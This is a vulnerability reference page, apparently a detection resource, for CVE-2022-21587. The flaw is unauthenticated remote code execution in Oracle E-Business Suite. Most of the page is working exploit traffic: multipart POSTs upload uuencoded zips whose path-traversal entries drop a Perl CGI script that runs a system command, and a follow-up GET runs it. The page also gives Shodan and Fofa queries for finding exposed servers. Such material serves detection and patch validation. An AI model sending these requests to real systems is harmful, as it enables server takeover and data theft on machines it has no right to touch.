🔙 목록으로 돌아가기

CVE-2022-21587: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution

TitleOracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
Authorrootxharsh,iamnoooob,pdresearch
SeverityCritical
ImpactUnauthenticated attackers can upload arbitrary files including malicious scripts via the BneViewerXMLService endpoint, achieving remote code execution and complete server compromise.
RemediationApply the necessary security patches provided by Oracle to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94397
CVE IDCVE-2022-21587
CWE IDCWE-306
Shodan Queryhttp.title:"login" "x-oracle-dms-ecid" 200
Fofa Querytitle="login" "x-oracle-dms-ecid" 200
Tags cve cve2022 intrusive ebs unauth kev rce oast oracle packetstorm vkev vuln

🔍 Vulnerability Description

Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

🌐 HTTP Request

POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Content-Length: 795
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
Accept-Encoding: gzip

------WebKitFormBoundaryZsMro0UsAQYLDZGv

Content-Disposition: form-data; name="bne:uueupload"



TRUE

------WebKitFormBoundaryZsMro0UsAQYLDZGv

Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"



begin 664 test.zip

M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO

M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.

M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G

M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R

M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#

M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN

M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R

G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````

`

end

------WebKitFormBoundaryZsMro0UsAQYLDZGv--
GET /OA_CGI/FNDWRR.exe HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: close
Accept-Encoding: gzip
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.8
Connection: close
Content-Length: 585
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
Accept-Encoding: gzip

------WebKitFormBoundaryZsMro0UsAQYLDZGv

Content-Disposition: form-data; name="bne:uueupload"



TRUE

------WebKitFormBoundaryZsMro0UsAQYLDZGv

Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"



begin 664 test.zip

M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO

M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.

M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````

M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA

M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`

(``!B````````

`

end

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-21587.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-21587.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A